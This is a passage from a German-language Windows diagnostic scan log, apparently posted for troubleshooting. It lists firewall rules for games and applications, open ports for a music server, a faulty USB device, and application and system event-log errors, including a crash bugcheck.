[UDP Query User{2314FC4F-415A-4DF3-AA49-81CFB9ACE68A}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [TCP Query User{DA695000-4AF9-41AF-9754-C8FA4C6954C1}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query User{8D614418-EAB5-437D-8C47-BA5ACE131844}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [TCP Query User{A397AF39-676F-4717-8C88-59C336141F49}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query User{E5A7347B-77B2-483E-8FE8-4CAA8722A8D3}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [TCP Query User{7409D24F-3B4B-47E4-91B8-98CDC53334D0}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe FirewallRules: [UDP Query User{4B5DB8A4-B9FF-49E3-A8CF-8F2DDDB8F35E}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe FirewallRules: [{F723C80F-371B-4A95-8F54-FA07E9E42973}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe FirewallRules: [{3059C505-B8D3-418B-AC08-C874D15FA7DE}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe FirewallRules: [TCP Query User{3C48B5B3-18E3-4B84-A540-634DC83BA8B8}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe FirewallRules: [UDP Query User{B8D0287B-F1FE-4955-A6F8-D589CB7A01F5}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe 
FirewallRules: [{DB86E705-4890-40A5-853E-1F2EEC9DD046}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [{C497194B-F1B8-4616-B08F-6951EFC5E468}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [TCP Query User{410E0639-1031-468E-8C0C-9B488EDB7278}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{0A39A2D1-3CAD-4DEE-BFD9-AD76B69202F7}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [{ABF58F19-4D87-4BE8-A373-55D7E1D64B7A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{E9500049-D9E9-4E8B-A598-216A386F8B2C}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{6B35CD45-1CCB-44FE-8E73-3326D85DEF6B}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [{81BFC3EA-16DF-4E60-B196-7E489C7383B7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [{81D600BE-5020-4F81-BFB0-4BF18DA2B05D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{6E5A5B32-5FA5-4BC2-A041-480153DF1E83}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{6347001A-5F4B-4B99-BB7A-524AA41C0AD0}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{56D9A896-9B47-43D5-98CA-538A542BD200}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{D9FC3B0B-F50C-4BC2-BF3F-CDE2F2C9A290}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{5A1C6FA4-8139-4243-B3B8-47B3EFB3EA53}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{A213CF29-EB9C-4BFC-A988-0B1F4472789D}] => (Allow) 
G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{D64B53D7-E8CD-40BD-9C91-72A20AD3970A}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{F2578368-AA70-433E-B35A-5009C86D1E17}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{9F5E0788-335F-42C1-A22C-50F7D9CDC79D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{32406C39-953C-460B-AFE6-CDE4B232D40D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [TCP Query User{3EDA9F19-1F96-411E-8C1C-F563E58A3ADE}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [UDP Query User{68DEDDE0-6036-412F-AA44-08A74EE184D7}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [{AE314296-B5C7-4DF4-9374-D088F3A08615}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [{FDD2B1D2-8138-4DF1-B121-ED318FBA427B}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [{29D2BACC-43CD-4803-B503-59899E87FD68}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe FirewallRules: [{FECFCD89-9DE5-49A3-B3A4-56AC70E40CD6}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe FirewallRules: [TCP Query User{D8825ED6-64AE-45C5-B113-ECB7858A95CA}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [UDP Query User{7E395701-8E52-444C-8DA5-90B6FF036164}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [{413FDA69-6273-4C65-BB74-8CE72A1CF6C4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: 
[{9ADFBB2B-0B80-4A64-8FCB-571605B6D8A4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [TCP Query User{A6D22F2F-32BB-4C44-8C74-EBDFE4627990}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [UDP Query User{E0FE8A20-C7CF-4897-B34B-C86C940403CA}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [{EBFEFE2F-A517-416E-AB96-B57AFAF058B1}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [{37DDA592-72D9-4843-B53B-828006F78A9A}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [{7E09FB06-AEB8-47CD-B06C-2F012CFD67D8}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe FirewallRules: [{44C7FB35-3400-4EEB-A7E0-CAABCFA9010D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe FirewallRules: [{2E30090F-BF18-4888-8C31-BDFB251C40AA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe FirewallRules: [{1E06EE93-F65D-4232-8C20-FF047C2960B3}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe FirewallRules: [{CB8A9966-C9BA-4D24-8DCF-82CCC446AD7E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe FirewallRules: [{10D47C8E-1911-4379-B2A7-3DFAF5FECB49}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe FirewallRules: [TCP Query User{AE697FDF-95CB-4742-AFE1-175E002D0CDD}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [UDP Query 
User{21CEB7FC-0894-4127-82BF-6C74648C47A4}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [{922401B8-85D9-4FC4-B488-C575AD393F0E}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe FirewallRules: [{A0BED04D-77EC-44B5-A349-7E6248C82D08}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe FirewallRules: [TCP Query User{6D865778-4B1C-48E3-8EDE-88B07DE0E8CE}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe FirewallRules: [UDP Query User{13FFCB9B-2BE1-472F-96CE-29F783837766}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe FirewallRules: [{CB31CEEC-1545-42AA-9B71-7426B88BFB5E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe FirewallRules: [{61419720-4278-4910-BFAC-E93AF187E7DF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe FirewallRules: [TCP Query User{9A8EDE9E-029B-47AF-A061-7525FEE74527}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [UDP Query User{9F7A08A0-4DBC-40F2-89AC-5BA6AA0CD90F}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [TCP Query User{B00611DA-10FE-4A45-9987-D344F69AFE59}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse 
studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [UDP Query User{3CE54E08-6C8E-4877-B238-A663ACEC403D}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [TCP Query User{02FD6615-749C-459B-9329-E9D3D840FD87}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [UDP Query User{0849F913-291A-4888-8D45-66C5704945BD}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [TCP Query User{6D5C88B3-7D5E-4872-82F0-A3CB31A96B85}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{5CB68C43-4C63-438F-98EB-749826872FBE}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [{75747872-239D-4591-85C3-EC5A1D6EC796}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe FirewallRules: [{A5A856A7-452C-421E-A65C-1EB4C29A172C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe FirewallRules: [{1508135B-998A-4813-8812-87AD3D57489A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe FirewallRules: [{DA814E91-168A-465A-9266-00F76B832A69}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe FirewallRules: [{4C6E3958-1227-48B4-A938-C23D7B034480}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe FirewallRules: [{01193C79-C53E-4CB8-B7C2-5F0F8EC74B25}] => (Allow) G:\Program Files 
(x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe FirewallRules: [{F72D0DCF-6A2B-4F0C-BBA7-0C8DD6BCC27F}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe FirewallRules: [{A93DA08B-800F-4E4E-8BBB-368C93F6080A}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe FirewallRules: [{D3231BE9-FB26-4B52-A06F-C76F95C54121}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe FirewallRules: [{C17DA570-D7C5-4124-A736-398D9CEBB379}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe FirewallRules: [{F87F2FB5-8593-4BFD-B2A9-A08FA335DB4D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe FirewallRules: [{DD2FEDAC-B152-4BA8-A685-87BB03D81555}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe FirewallRules: [{DC75C909-CEA5-498F-B98D-A5FA3673F55B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [{67EB36C9-7978-4E8B-B4E2-D789597F76F7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [TCP Query User{1B9BBC75-D6A3-451D-9402-7BF428C6B964}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [UDP Query User{9F8F6E86-D511-4F2C-892D-703134694F63}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [{8AF18EE4-FBC6-4D0A-BC4E-D3F149CDB2A9}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe FirewallRules: [{87EB15D3-94CF-4471-A526-5B82C235CB03}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe FirewallRules: 
[{CA69E6B0-A279-4343-AF7A-0AF44A42D8DA}] => (Block) LPort=445 FirewallRules: [{E924BE7C-390D-4029-AF9F-F7E5005B87A0}] => (Block) LPort=445 FirewallRules: [{B3BD5C1D-80FD-4A00-BF14-9B9B1B4C9F15}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe FirewallRules: [{38D2290F-C6D2-4166-A44D-3ECDEEA6A2AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe FirewallRules: [TCP Query User{50D16B60-67AB-488A-AE5C-E61D97824CA9}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [UDP Query User{19EF7346-06B2-43ED-8F39-A83414013D6C}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [{6DB5B824-C375-4374-B640-5A46AE0D856B}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{2F010EF3-6120-4A95-B9C0-5CD981CCF542}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{09CB81DB-7550-4F7B-B023-18A4A3920F6B}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe FirewallRules: [{692B4130-23BF-4C1F-96BC-5039D5E48ED4}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe FirewallRules: [{C0A906DA-FAB3-4A93-97C7-F59B870BDFA1}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{BF2178FB-4544-451B-9B32-D5A4C31F4FCA}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{F37A5F7E-D189-4815-A302-2891EAFA783C}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe FirewallRules: [{7C735814-90CD-4F3A-A051-211C0BBD9495}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe FirewallRules: [{DAC4BDBD-6873-4C9D-A3D9-1CF7A9DBD691}] => (Allow) G:\Program Files 
(x86)\Steam\steamapps\common\TheLongDark\tld.exe FirewallRules: [{D08800A7-21B0-4FDF-93DC-9BBF11F5F80E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe FirewallRules: [{607765EA-BFDC-4528-857D-9DB7207FA061}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe FirewallRules: [{9C65B7A2-4B3D-4E1D-98A3-4C2662F366C7}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe FirewallRules: [{FEA59EF6-632E-4765-9BA8-17DBA601260E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [{5B99B3A8-F2E7-4326-BBDD-FC046CAA57D7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [{6AB67BB1-CE72-42C7-B1A7-686993AA20AC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{AFFDAA2A-A01E-4601-9977-4EC518739200}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{064DE8B2-CDAB-4E65-AA20-4F44B1C38564}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{F30A19A3-5234-4E0D-8B86-B393932138B4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{EA33863E-67CD-4843-A527-7077DE793E0E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{ED9892D6-6D9D-426F-97C9-38483F4C7806}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{C6E60452-31A4-49DE-8FC4-6093529938F3}] => (Allow) C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe FirewallRules: [{E76100CD-DE19-44E3-957C-3D5E4FCCDCC3}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe DomainProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI) DomainProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI) 
DomainProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI) DomainProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI) DomainProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI) DomainProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI) DomainProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI) DomainProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI) DomainProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI) DomainProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI) DomainProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI) DomainProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI) DomainProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI) DomainProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI) DomainProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI) DomainProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp DomainProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp DomainProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp DomainProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp StandardProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI) StandardProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI) StandardProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI) StandardProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI) StandardProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI) StandardProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI) 
StandardProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI) StandardProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI) StandardProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI) StandardProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI) StandardProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI) StandardProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI) StandardProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI) StandardProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI) StandardProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI) StandardProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp StandardProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp StandardProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp StandardProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp ==================== Wiederherstellungspunkte ========================= 09-08-2017 18:56:47 JRT Pre-Junkware Removal ==================== Fehlerhafte Geräte im Gerätemanager ============= Name: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.) Description: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.) Class Guid: {36fc9e60-c465-11cf-8056-444553540000} Manufacturer: (Standard-USB-Hostcontroller) Service: Problem: : Windows has stopped this device because it has reported problems. (Code 43) Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. 
==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (08/09/2017 06:57:01 PM) (Source: ESENT) (EventID: 455) (User: ) Description: SettingSyncHost (8636) {7275B360-D16E-4A63-999E-C1E83CAE2702}: Fehler -1811 (0xfffff8ed) beim Öffnen von Protokolldatei C:\Users\*****\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\edb0001C.log. Error: (08/09/2017 06:55:36 PM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: (08/09/2017 06:55:06 PM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: (08/09/2017 06:33:11 PM) (Source: Windows Search Service) (EventID: 3079) (User: ) Description: Benachrichtigungen für Volume C:\ sind nicht aktiv. Kontext: Windows Anwendung Details: Falscher Parameter. (HRESULT : 0x80070057) (0x80070057) Error: (08/08/2017 11:12:20 PM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: (08/08/2017 11:09:20 PM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. 
Error: (08/08/2017 07:54:42 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: svchost.exe_AppReadiness, Version: 10.0.15063.0, Zeitstempel: 0x02799ef5 Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.15063.447, Zeitstempel: 0xa329d3a8 Ausnahmecode: 0xc0000374 Fehleroffset: 0x00000000000f775f ID des fehlerhaften Prozesses: 0x14c0 Startzeit der fehlerhaften Anwendung: 0x01d3106f677803f8 Pfad der fehlerhaften Anwendung: c:\windows\system32\svchost.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll Berichtskennung: e32cdd45-cc09-4755-a884-1766a58cffdb Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (08/08/2017 07:28:21 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: Die Open-Prozedur für den Dienst "BITS" in der DLL "C:\Windows\System32\bitsperf.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode. Error: (08/08/2017 06:00:39 PM) (Source: ESENT) (EventID: 455) (User: ) Description: SettingSyncHost (7672) {6A2B0A61-8ED9-4BCE-AD27-3A8AE10CACC4}: Fehler -1811 (0xfffff8ed) beim Öffnen von Protokolldatei C:\Users\*****\AppData\Local\Microsoft\Windows\SettingSync\metastore\edb00025.log. Error: (08/08/2017 05:58:23 PM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Systemfehler: ============= Error: (08/09/2017 06:56:58 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "NVIDIA NetworkService Container" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. 
Error: (08/09/2017 06:56:58 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "NVIDIA LocalSystem Container" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 6000 Millisekunden durchgeführt: Neustart des Diensts. Error: (08/09/2017 06:56:56 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "NVIDIA Display Container LS" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts. Error: (08/09/2017 06:42:41 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Digital Wave Update Service" wurde aufgrund folgenden Fehlers nicht gestartet: Das System kann die angegebene Datei nicht finden. Error: (08/09/2017 06:40:25 PM) (Source: BugCheck) (EventID: 1001) (User: ) Description: Der Computer wurde nach einem schwerwiegenden Fehler neu gestartet. Der Fehlercode war: 0x00000050 (0xffff8900bc3a2000, 0x0000000000000002, 0xfffff80318b0a846, 0x0000000000000000). Ein volles Abbild wurde gespeichert in: C:\WINDOWS\MEMORY.DMP. Berichts-ID: 7499a157-048c-4741-ae6b-42281a81fc43. Error: (08/09/2017 06:40:24 PM) (Source: NETLOGON) (EventID: 3095) (User: ) Description: Dieser Computer ist als Mitglied einer Arbeitsgruppe konfiguriert, nicht als Mitglied einer Domäne. Der Anmeldedienst braucht bei dieser Konfiguration nicht gestartet zu sein. Error: (08/09/2017 06:40:23 PM) 